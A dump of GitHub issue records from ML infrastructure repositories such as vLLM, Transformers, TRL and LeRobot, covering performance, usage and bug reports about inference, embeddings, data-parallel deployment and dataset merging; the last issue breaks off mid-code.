"vllm-project/vllm", "number": 29089, "title": "[Performance]: Can we use CUDA graph to accelerate the Qwen2_5omniAudioEncoder in Qwen2.5-Omni-3B?", "body": "### Proposal to improve performance\n\n\"Image\"\nThe trace graph shows that Qwen2_5omniAudioEncoder has a large number of small kernel startups, indicating significant room for optimization.\nCan we use CUDA graph to accelerate the Qwen2_5omniAudioEncoder in Qwen2.5-Omni-3B?\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29089", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-20T12:13:58Z", "updated_at": "2025-11-20T12:13:58Z", "comments": 0, "user": "xq25478" }, { "repo": "vllm-project/vllm", "number": 29078, "title": "[Performance]: \u591a\u5b9e\u4f8b\u5bfc\u81f4\u7684cpu\u5360\u7528\u8fc7\u9ad8", "body": "### Your current environment\nGPU: RTX4090\ncuda version: cuda12.8\nvllm version: 0.11.0\n\n\u4e2d\u6587\uff1a\u6211\u4f7f\u7528triton server\u7684 vllm backend \u542f\u52a8\u4e864\u4e2a minerU2.5 \u6a21\u578b\u7684\u5b9e\u4f8b\uff0c\u6211\u7684\u670d\u52a1\u5668\u4e0a\u67092\u5f20\u5361\uff0c\u6211\u6bcf\u5f20\u5361\u542f\u52a8\u4e861\u4e2a\u5b9e\u4f8b\uff0c\u6211\u53d1\u73b0cpu\u8d1f\u8f7d\u6709\u65f6\u5019\u6781\u9ad8\uff0c\u51e0\u4e4e\u5360\u6ee1\u4e86\u6211\u7684\u670d\u52a1\u5668\uff0c\u6211\u7684\u670d\u52a1\u5668\u670996\u6838\uff0cvllm backend\u4f7f\u7528\u7684\u662fAsyncLLMEngine\uff0c\u6211\u89c2\u5bdf\u5230\u5728\u5355\u5361\u4e0a\u542f\u52a8\u4e00\u4e2a\u5b9e\u4f8b\u65f6\uff0c\u6211\u53d1\u9001200\u5f20\u5c0f\u5c3a\u5bf8\u7684\u6587\u5b57\u56fe\u505aOCR\u65f6\uff0cfps\u53ef\u4ee5\u8fbe\u5230\u6700\u9ad8\uff0c\u4e5f\u5c31\u662f\u6bcf\u79d2\u53ef\u4ee5\u5904\u7406200\u5f20\u7684\u56fe\u7247\uff0ccpu\u8d1f\u8f7d\u572840-50%\u5de6\u53f3\uff0c\u4e3a\u4e86\u8fdb\u4e00\u6b65\u589e\u52a0\u6027\u80fd\uff0c\u6211\u5728\u4e24\u5f20\u5361\u4e0a\u5404\u542f\u52a8\u4e86\u4e00\u4e2a\u5b9e\u4f8b\uff0c\u4f46\u662f\u6211\u89c2\u5bdf\u5230\u6b64\u65f6cpu\u8d1f\u8f7d\u51e0\u4e4e\u8fbe\u523099%\uff0c\u5360\u7528\u4e86\u6781\u9ad8\u7684cpu\uff0c\u6bcf\u4e2a\u5b9e\u4f8b\u7684fps\u53ea\u6709120\u5de6\u53f3\uff0c\u6027\u80fd\u51e0\u4e4e\u6ca1\u6709\u63d0\u5347\u3002\n\n\u6211\u505a\u4e86\u5927\u91cf\u7684\u6d4b\u8bd5\uff0c\u6211\u5f00\u59cb\u4ee5\u4e3a\u662ftriton server\u7684\u95ee\u9898\uff0c\u4f46\u7ecf\u8fc7\u6392\u67e5\uff0c\u6211\u8ba4\u4e3a\u95ee\u9898\u53ef\u80fd\u51fa\u73b0\u5728vllm\u63a8\u7406\u65f6\u5360\u7528\u4e86\u5f88\u9ad8\u7684cpu\uff0c\u56e0\u4e3a\u6211\u4e0d\u4f7f\u7528triton server\uff0c\u4f7f\u7528 `vllm serve`\u6765\u6a21\u62df\u540c\u6837\u7684\u60c5\u51b5\uff0c\u6bcf\u4e2avllm\u5b9e\u4f8b\u63a8\u7406\u65f6\u4e5f\u5360\u7528\u6389\u4e8620-30%\u7684cpu\uff0c\u5982\u679c\u8fd9\u6837\uff0c\u6211\u7684\u670d\u52a1\u5668\u5373\u4f7f\u6709\u518d\u591a\u7684GPU\uff0c\u4e5f\u4e0d\u80fd\u591f\u63d0\u5347\u6a21\u578b\u7684\u6027\u80fd\uff0c\u6211\u8be5\u5982\u4f55\u8c03\u8bd5\uff1f\nenglish\uff1a\nI launched 4 instances of the minerU2.5 model using the vllm backend of Triton Server. My server is equipped with 2 GPUs, with 1 instance running on each GPU. However, I noticed that the CPU load sometimes spikes to extremely high levels, nearly maxing out the server\u2014which has 192 CPU cores. The vllm backend uses AsyncLLMEngine.\n\nWhen running a single instance on one GPU and sending 200 small-sized text images for OCR, I achieved the highest FPS\u2014processing up to 200 images per second\u2014with the CPU load hovering around 40-50%. To further improve performance, I launched one instance on each of the two GPUs. But in this scenario, the CPU load reached nearly 99% (extremely high usage), and each instance only achieved around 120 FPS, with almost no performance gain.\n\nI conducted numerous tests. Initially, I suspected the issue was with Triton Server, but after troubleshooting, I believe the problem lies in the high CPU usage during vllm inference. Even when not using Triton Server\u2014simulating the same scenario with `vllm serve`\u2014each vllm instance consumes 20-30% of the CPU. If this persists, adding more GPUs to the server will not improve model performance. How should I debug this?\n\n\n### How would you like to use vllm\n\nI want to run inference of a [[MinerU2.5-2509-1.2B]().](https://huggingface.co/opendatalab/MinerU2.5-2509-1.2B) I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29078", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-20T08:26:35Z", "updated_at": "2025-11-21T02:17:51Z", "comments": 4, "user": "zjq1996518" }, { "repo": "huggingface/transformers", "number": 42291, "title": "Can we disable IPython progress bar and use normal tqdm bar?", "body": "I like the normal tqdm bar much better, it is lighter, cleaner, simpler, and less stress on my eyes (no green color). I would love to have an option to use tqdm bar and not IPython bar. ", "url": "https://github.com/huggingface/transformers/issues/42291", "state": "closed", "labels": [], "created_at": "2025-11-20T01:26:11Z", "updated_at": "2025-12-28T08:02:45Z", "comments": 1, "user": "weathon" }, { "repo": "vllm-project/vllm", "number": 29023, "title": "[Feature]: Disable logging `/metrics`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n- IGW hits `/metrics` continuously to understand the current load on the system\n- This leads to an overload of logs\n- We can disable this with `--disable-uvicorn-access-log`, but lose access to all access logs\n\nWe should have `--disable-uvicorn-metrics-access-log` to avoid logging * just * metrics. Per Gemini, we can do this with something like:\n\n```python\n# Define the routes for which access logs should be disabled\nEXCLUDE_PATHS = [\"/health\", \"/metrics\"]\n\nclass EndpointFilter(logging.Filter):\n def filter(self, record: logging.LogRecord) -> bool:\n # Check if the log record contains arguments and if the path matches an excluded path\n if record.args and len(record.args) >= 3:\n path = record.args[2] # The path is typically the third argument in uvicorn access logs\n if path in EXCLUDE_PATHS:\n return False # Exclude this log record\n return True # Include all other log records\n```\n\nCreate a command line arg like `--disable-uvicorn-metrics-access-log`which selectively disables logging hits to `/metrics`\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29023", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-19T18:25:48Z", "updated_at": "2025-11-19T21:57:34Z", "comments": 5, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/sentence-transformers", "number": 3575, "title": "How to override model's `max_seq_length`?", "body": "It seems that impossible to override model's max length from `sentence_bert_config.json`. \n\n```python\nfrom sentence_transformers import SentenceTransformer\n\nm = SentenceTransformer(\"intfloat/e5-small\", tokenizer_kwargs={\"model_max_length\":3})\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"]))\n# {'input_ids': tensor([[ 101, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632,\n# 7632, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])}\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"], truncation=True))\n# {'input_ids': tensor([[ 101, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632,\n# 7632, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])}\nprint(m[0].tokenizer([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"], truncation=True))\n# {'input_ids': [[101, 7632, 102]], 'token_type_ids': [[0, 0, 0]], 'attention_mask': [[1, 1, 1]]}\n\nm.max_seq_length = 3\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"]))\n# {'input_ids': tensor([[ 101, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1]])}\n```\n\nThis is happening because during load it load `max_seq_length` from `sentence_bert_config` and then in `Transformers` it will override `max_seq_length` only it wasn't set in `sentence_bert_config` https://github.com/huggingface/sentence-transformers/blob/ad28c0a982acc39c73abdf0019faca10f227ef28/sentence_transformers/models/Transformer.py#L101-L118 even if `model_max_length` is passed in `tokenizer_kwargs` and then `max_seq_length` will be used as `max_length` instead of passed in kwargs https://github.com/huggingface/sentence-transformers/blob/ad28c0a982acc39c73abdf0019faca10f227ef28/sentence_transformers/models/Transformer.py#L319-L327\n\nProbably this can be fixed by\n\n```diff\nmax_seq_length = min(max_seq_length, self.tokenizer.model_max_length)\n```\n\n\nSource https://github.com/embeddings-benchmark/mteb/pull/3587#discussion_r2542434603\nI think this is cause of https://github.com/huggingface/sentence-transformers/issues/3187", "url": "https://github.com/huggingface/sentence-transformers/issues/3575", "state": "open", "labels": [], "created_at": "2025-11-19T16:42:27Z", "updated_at": "2025-11-20T13:47:13Z", "user": "Samoed" }, { "repo": "huggingface/trl", "number": 4546, "title": "Does TRL support PipelineRL for compute efficiency?", "body": "Hi \ud83d\udc4b,\n\nI'm trying to understand whether TRL currently supports (or plans to support) the PipelineRL approach described here:\n\n- Paper: [https://arxiv.org/pdf/2509.19128v2](https://arxiv.org/pdf/2509.19128v2?utm_source=chatgpt.com)\n- Overview: [https://arxiv.org/html/2509.19128](https://arxiv.org/html/2509.19128?utm_source=chatgpt.com)\n\nPipelineRL introduces an actor\u2013learner pipeline with in-flight weight updates, where actors keep generating while the learner updates weights concurrently. This reduces policy lag and improves GPU utilization for long-context RL runs.\n\n\nDoes TRL currently support this kind of pipelineRL workflow, or is there a recommended way to approximate it using the existing TRL trainers (GRPO + vLLM)?\n\nIf not, I'd love suggestions or best practices for building something similar on top of TRL.\n\nThanks! \ud83d\ude4f", "url": "https://github.com/huggingface/trl/issues/4546", "state": "open", "labels": [ "\u2728 enhancement", "\u2753 question" ], "created_at": "2025-11-19T12:39:29Z", "updated_at": "2025-11-22T12:43:54Z", "comments": 3, "user": "harisarang" }, { "repo": "vllm-project/vllm", "number": 28996, "title": "[Usage]: How to run a single data parallel deployment across multiple nodes without ray", "body": "### Your current environment\n\n2 Nodes, each node has 8 H20 GPUs.\n\n### How would you like to use vllm\n\nAccording to https://docs.vllm.ai/en/latest/serving/data_parallel_deployment/#internal-load-balancing\n\n```shell\n# node0\nvllm serve Qwen3-Coder-480B-A35B-Instruct --trust-remote-code --max-num-seqs 64 --max-model-len 131072 --port $PORT0 --host :: --data-parallel-size 2 --data-parallel-size-local 1 --data-parallel-address $NODE0_IPV6 --data-parallel-rpc-port $PORT1\n\n# node1\nvllm serve Qwen3-Coder-480B-A35B-Instruct --trust-remote-code --max-num-seqs 64 --max-model-len 131072 --headless --data-parallel-size 2 --data-parallel-size-local 1 --data-parallel-start-rank 1 --data-parallel-address $NODE0_IPV6 --data-parallel-rpc-port $NODE0_PORT1\n```\nbut all of them are hanging on waiting for init message from front-end.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28996", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-19T06:47:22Z", "updated_at": "2025-11-27T06:17:22Z", "comments": 3, "user": "crystalww" }, { "repo": "vllm-project/vllm", "number": 28986, "title": "[Feature]: Fused Kernel for GPT-OSS Router", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n\"Image\"\n\n- Right now, we spend ~3.5% of the layer in the expert selection\n- The operation is unfused\n\nWrite a fused kernel like we have for deepseek grouped_topk\n\n### Alternatives\n\n- torch compile\n- triton\n- cuda\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28986", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-19T03:18:25Z", "updated_at": "2025-12-12T16:16:37Z", "comments": 7, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/transformers.js", "number": 1458, "title": "ONNX Backend Env variable", "body": "### Question\n\nHi, \n\nFor some context, I'm building an application that uses some of the models on huggingface as an annotation tool that helps create annotations for training a specialised model.\n\nAs for the specialised model, I am able to export them to onnx, and I was able to run this model in the same application, but I have to manually install the same onnxruntime-web version to be able to do so. I looked into the docs [here](https://huggingface.co/docs/transformers.js/api/backends/onnx#module_backends/onnx.createInferenceSession), but I cannot access these functions through `env.backends.onnx`. I've tried `console.log(env.backends.onnx.isONNXProxy())` and got \n```\nUncaught (in promise) TypeError: env.backends.onnx.isONNXProxy is not a function\n```\n\nIs there a way I can access the same inference session through this package? \n\n---------------------------------\n\nMy `package.json`\n\n```\n{\n \"dependencies\": {\n \"@huggingface/transformers\": \"3.7.5\",\n \"onnxruntime-web\": \"1.22.0-dev.20250409-89f8206ba4\"\n },\n}\n\n```", "url": "https://github.com/huggingface/transformers.js/issues/1458", "state": "open", "labels": [ "question" ], "created_at": "2025-11-19T01:26:02Z", "updated_at": "2025-11-25T15:36:13Z", "user": "Heinrik-20" }, { "repo": "vllm-project/vllm", "number": 28956, "title": "[Bug]: OOM when profiling multimodal model with multiple images", "body": "### Your current environment\n\nvLLM 0.11.0\n\n### \ud83d\udc1b Describe the bug\n\nAs per title. \n\nThe error log is as follows:\n```\n[multiproc_executor.py:671] Traceback (most recent call last):\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/executor/multiproc_executor.py\", line 666, in worker_busy_loop\n[multiproc_executor.py:671] output = func(*args, **kwargs)\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n[multiproc_executor.py:671] return func(*args, **kwargs)\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/worker/gpu_worker.py\", line 263, in determine_available_memory\n[multiproc_executor.py:671] self.model_runner.profile_run()\n[multiproc_executor.py:671] File \"/root/miniconda3/lib/python3.11/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 3379, in profile_run\n[multiproc_executor.py:671] expanded = output.new_zeros(\n[multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^\n[multiproc_executor.py:671] torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 3.00 GiB. GPU 6 has a total capacity of 139.81 GiB of which 2.58 GiB is free. Including non-PyTorch memory, this process has 137.21 GiB memory in use. Of the allocated memory 134.77 GiB is allocated by PyTorch, and 255.64 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n```\nLooks like we only need **ONE** encoder cache with shape `(encoder_budget, encoder_output_shape[-1])` rather than `len(dummy_encoder_outputs)` ones.\nhttps://github.com/vllm-project/vllm/blob/da8dadf68b5a2af849e7c5fd35ce9b8525d8d398/vllm/v1/worker/gpu_model_runner.py#L4128-L4144\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28956", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-18T17:36:55Z", "updated_at": "2025-11-25T12:38:37Z", "comments": 7, "user": "imShZh" }, { "repo": "huggingface/lerobot", "number": 2475, "title": "Why there is difference between async inference and local inference in image resize?", "body": "I read code between `src/lerobot/async_inference/policy_server.py` and `src/lerobot/scripts/lerobot_record.py`. I found difference in these 2 code about inference which causes different image shape\n1. `src/lerobot/scripts/lerobot_record.py` use this to deal with observation\nAnd `prepare_observation_for_inference` is like this:\n```python\ndef prepare_observation_for_inference(\n observation: dict[str, np.ndarray],\n device: torch.device,\n task: str | None = None,\n robot_type: str | None = None,\n) -> RobotObservation:\n for name in observation:\n observation[name] = torch.from_numpy(observation[name])\n if \"image\" in name:\n observation[name] = observation[name].type(torch.float32) / 255\n observation[name] = observation[name].permute(2, 0, 1).contiguous()\n observation[name] = observation[name].unsqueeze(0)\n observation[name] = observation[name].to(device)\n observation[\"task\"] = task if task else \"\"\n observation[\"robot_type\"] = robot_type if robot_type else \"\"\n return observation\n```\n\nHere no **resize** operation in images i think. \n\n2. in async_inference policy_server.py,it uses\nBut here function`prepare_raw_observation` makes sense on image shape\n```python\ndef prepare_raw_observation(\n robot_obs: RawObservation,\n lerobot_features: dict[str, dict],\n policy_image_features: dict[str, PolicyFeature],\n) -> Observation:\n \"\"\"Matches keys from the raw robot_obs dict to the keys expected by a given policy (passed as\n policy_image_features).\"\"\"\n # 1. {motor.pos1:value1, motor.pos2:value2, ..., laptop:np.ndarray} ->\n # -> {observation.state:[value1,value2,...], observation.images.laptop:np.ndarray}\n lerobot_obs = make_lerobot_observation(robot_obs, lerobot_features)\n # 2. Greps all observation.images.<> keys\n image_keys = list(filter(is_image_key, lerobot_obs))\n # state's shape is expected as (B, state_dim)\n state_dict = {OBS_STATE: extract_state_from_raw_observation(lerobot_obs)}\n image_dict = {\n image_k: extract_images_from_raw_observation(lerobot_obs, image_k) for image_k in image_keys\n }\n # Turns the image features to (C, H, W) with H, W matching the policy image features.\n # This reduces the resolution of the images\n image_dict = {\n key: resize_robot_observation_image(torch.tensor(lerobot_obs[key]), policy_image_features[key].shape)\n for key in image_keys\n }\n if \"task\" in robot_obs:\n state_dict[\"task\"] = robot_obs[\"task\"]\n return {**state_dict, **image_dict}\n```\nHere the shape of observation images is modified to policy config\n```python\ndef resize_robot_observation_image(image: torch.tensor, resize_dims: tuple[int, int, int]) -> torch.tensor:\n assert image.ndim == 3, f\"Image must be (C, H, W)! Received {image.shape}\"\n # (H, W, C) -> (C, H, W) for resizing from robot obsevation resolution to policy image resolution\n image = image.permute(2, 0, 1)\n dims = (resize_dims[1], resize_dims[2])\n # Add batch dimension for interpolate: (C, H, W) -> (1, C, H, W)\n image_batched = image.unsqueeze(0)\n # Interpolate and remove batch dimension: (1, C, H, W) -> (C, H, W)\n resized = torch.nn.functional.interpolate(image_batched, size=dims, mode=\"bilinear\", align_corners=False)\n\n return resized.squeeze(0)\n``` \n\nI found this when I can inference correctly locally by made weird action outputs from async inference. it must be caused by my didn't resize input image when training. -.-\n\n\nversion:deb9596bd3796c03ae3a5a6b81b63c1dba296256\n", "url": "https://github.com/huggingface/lerobot/issues/2475", "state": "open", "labels": [ "question" ], "created_at": "2025-11-18T14:32:17Z", "updated_at": "2025-11-24T02:23:13Z", "user": "milong26" }, { "repo": "vllm-project/vllm", "number": 28943, "title": "[Usage]: what's the right way to run embedding model in vllm 0.11.0", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\nin vllm 0.8.7\uff0cI use following code to run local vllm\uff0call is right\uff1a\n```\n self.engine_args = EngineArgs(\n model=self.model_path,\n dtype='half',\n task=\"embed\",\n trust_remote_code=True,\n limit_mm_per_prompt={\"image\": 1},\n )\n e = asdict(self.engine_args)\n self.max_len = 100\n self.llm = LLM(**e)\n out = self.llm.embed(datas)\n```\nBut in vllm 0.11.0 according to the document https://www.aidoczh.com/vllm/models/pooling_models.html\uff0cit use runner=='pooling' to run embedding task. What's the diffenence? Could the 'task' arg 'embed' still take effect?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28943", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-18T13:47:57Z", "updated_at": "2025-11-20T10:49:12Z", "comments": 3, "user": "neverneverendup" }, { "repo": "huggingface/trl", "number": 4541, "title": "Is attn_implementation=sdpa not supported when using SFTTrainer with mllama?", "body": "When trying to use `sdpa` with mllama I get an error using the default collator. Upon writing my own collator it works.\nWhen using `eager` implementation it gives cuda oom error. Is `sdpa` not supported?", "url": "https://github.com/huggingface/trl/issues/4541", "state": "open", "labels": [], "created_at": "2025-11-18T11:57:01Z", "updated_at": "2025-11-18T11:57:01Z", "comments": 0, "user": "osaidr" }, { "repo": "vllm-project/vllm", "number": 28930, "title": "[Usage]: How to build a qwen3vl embedding model with a custom mlp layer on the top use vllm?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n\n```\n\nHi friends! I train a sft model built upon qwen3vl 2b model, we put a mlp layer on it to compress the embedding size of the backbone model. Now I want to use vllm 0.11.0 to serve it but I meet some confuse. Here is my custom class code\n\n```\nfrom argparse import Namespace\nfrom dataclasses import asdict\nfrom typing import Literal, NamedTuple, Optional, TypedDict, Union, get_args\nimport torch\nimport torch.nn as nn\nfrom vllm.model_executor.models.qwen3_vl import Qwen3VLForConditionalGeneration\n\nfrom vllm.v1.pool.metadata import PoolingMetadata\nfrom vllm.v1.sample.metadata import SamplingMetadata\n\nfrom vllm.config import VllmConfig\nfrom vllm.multimodal import MULTIMODAL_REGISTRY\n\n\nclass CustomQwenVL3BPool(nn.Module):\n def __init__(\n self\n ):\n super().__init__()\n self.out = torch.nn.Sequential(\n torch.nn.Linear(2048, 512),\n torch.nn.SiLU(),\n torch.nn.Linear(512, 128)\n )\n\n def get_prompt_lens(self,\n hidden_states: Union[torch.Tensor, list[torch.Tensor]],\n pooling_metadata: PoolingMetadata,\n ) -> torch.Tensor:\n return pooling_metadata.prompt_lens\n\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n pooling_metadata: PoolingMetadata,\n ) -> Union[list[torch.Tensor], torch.Tensor]:\n # 1 \u63d0\u53d6lasttoken\n prompt_lens = self.get_prompt_lens(hidden_states, pooling_metadata)\n last_token_flat_indices = torch.cumsum(prompt_lens, dim=0) - 1\n hidden_states = hidden_states[last_token_flat_indices]\n # 2 mlp\u538b\u7f29\u7ef4\u5ea6\n mlp_output = self.out(hidden_states)\n # 3 \u6b63\u5219\u5316\u8f93\u51fa\uff0c\u9700\u8981check\u4e0bvllm\u662f\u5426\u4f1a\u518d\u6b21norm\n normalized_output = F.normalize(mlp_output, p=2, dim=-1)\n return normalized_output\n \n\nclass CustomQwen3VLForConditionalGeneration(Qwen3VLForConditionalGeneration):\n def __init__(self, *, vllm_config: VllmConfig, prefix: str = \"\"):\n super().__init__(vllm_config=vllm_config, prefix=prefix)\n self._pooler = CustomQwenVL3BPool()\n```\nWhen I run above code using local mode of vllm , error log says **\"[adapters.py:79] ST projector loading failed\".Does anybody know why?** BTW\uff0cwhat's the best practice to make a custom embedding model with mlp in vllm 0.11.0\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28930", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-18T10:32:07Z", "updated_at": "2025-12-23T04:49:30Z", "comments": 10, "user": "neverneverendup" }, { "repo": "vllm-project/vllm", "number": 28929, "title": "[Usage]: How", "body": "=", "url": "https://github.com/vllm-project/vllm/issues/28929", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-18T10:26:17Z", "updated_at": "2025-11-18T10:30:53Z", "comments": 0, "user": "neverneverendup" }, { "repo": "huggingface/datasets", "number": 7869, "title": "Why does dataset merge fail when tools have different parameters?", "body": "Hi, I have a question about SFT (Supervised Fine-tuning) for an agent model.\n\nSuppose I want to fine-tune an agent model that may receive two different tools: tool1 and tool2. These tools have different parameters and types in their schema definitions.\n\nWhen I try to merge datasets containing different tool definitions, I get the following error:\n\nTypeError: Couldn't cast array of type\nstruct, ... , servicerId: struct>\nto\n{\n 'refundFee': {'description': Value(dtype='string'), 'type': Value(dtype='string')},\n ...\n 'templateId': {'description': Value(dtype='string'), 'type': Value(dtype='string')}\n}\nFrom my understanding, the merge fails because the tools column's nested structure is different across datasets \u2014 e.g., one struct contains an extra field servicerId while the other does not. This causes HuggingFace Datasets (and its underlying Apache Arrow schema) to reject the merge.\n\nMy question is: why is it designed this way?\n\nIs this strict schema matching a hard requirement of the library?\nIs there a recommended way to merge datasets with different tool schemas (different parameters and types)?\nFor an agent model supporting multiple tools, what's the best practice for preparing/merging training data without losing flexibility?\nAny guidance or design rationale would be greatly appreciated. Thanks!", "url": "https://github.com/huggingface/datasets/issues/7869", "state": "open", "labels": [], "created_at": "2025-11-18T08:33:04Z", "updated_at": "2025-11-30T03:52:07Z", "comments": 1, "user": "hitszxs" }, { "repo": "vllm-project/vllm", "number": 28903, "title": "[Bug]: vllm inference on qwen3-vl when use_upstream_fa is False", "body": "### Your current environment\n\npip show torch vllm flash-attn\n\nName: torch\nVersion: 2.8.0\n\n---\nName: vllm\nVersion: 0.11.0\n\n\nName: flash_attn\nVersion: 2.8.3\n\n\n\n### \ud83d\udc1b Describe the bug\n\nunit-test code as the follows,\nwhen simple qwen3-0.6B can run; but qwen3-vl-4b not run\n```python\n#coding=utf-8\n\"\"\"\n\u5199\u5355\u5143\u6d4b\u8bd5\u6765\u9a8c\u8bc1FA\u548cVLLM\u7684\u53ef\u7528\u6027\u548c\u517c\u5bb9\u6027\n\"\"\"\n\nimport torch\nfrom flash_attn import flash_attn_func\nimport unittest\nimport vllm\n# from vllm.attention.backends import get_attn_backend\n\nclass TestFA_VLLM(unittest.TestCase):\n def testFA(self,):\n # \u68c0\u67e5CUDA\u662f\u5426\u53ef\u7528\u53ca\u8bbe\u5907\n print(f\"CUDA available: {torch.cuda.is_available()}\")\n print(f\"Current device: {torch.cuda.current_device()}\")\n print(f\"Device name: {torch.cuda.get_device_name()}\")\n\n # \u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u7b80\u5355\u7684\u5f20\u91cf\u5e76\u79fb\u52a8\u5230GPU\n try:\n q = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n k = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n v = torch.randn(1, 1, 16, 64, dtype=torch.float16, device='cuda')\n output = flash_attn_func(q, k, v)\n print(\"FlashAttention test passed!\")\n except Exception as e:\n print(f\"FlashAttention test failed: {e}\")\n \n def oriTestVLLM(self,):\n # \u6253\u5370\u5f53\u524d\u4f7f\u7528\u7684attention\u540e\u7aef\n print(\"Available CUDA devices:\", torch.cuda.device_count())\n print(\"Current device:\", torch.cuda.current_device())\n print(\"Device name:\", torch.cuda.get_device_name())\n\n # \u68c0\u67e5vLLM\u914d\u7f6e\n print(\"vLLM version:\", vllm.__version__)\n\n # \u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u5c0f\u6a21\u578b\u6765\u89e6\u53d1\u540e\u7aef\u521d\u59cb\u5316\n try:\n from vllm import LLM\n llm = LLM(model=\"Qwen/Qwen3-0.6B\", max_model_len=256)\n print(\"vLLM\u521d\u59cb\u5316\u6210\u529f!\")\n prompt = \"\u8fd9\u662f\u4e00\u4e2a\u6d4b\u8bd5\u63d0\u793a\u3002\"\n response = llm.generate(prompt)\n print(\"rollout\u6d4b\u8bd5\u6210\u529f! \u751f\u6210\u7684\u6587\u672c:\", response)\n except Exception as e:\n print(f\"vLLM\u521d\u59cb\u5316\u5931\u8d25: {e}\")\n \n def testVLLM(self,):\n # \u6253\u5370\u5f53\u524d\u4f7f\u7528\u7684attention\u540e\u7aef\n print(\"Available CUDA devices:\", torch.cuda.device_count())\n print(\"Current device:\", torch.cuda.current_device())\n print(\"Device name:\", torch.cuda.get_device_name())\n\n # 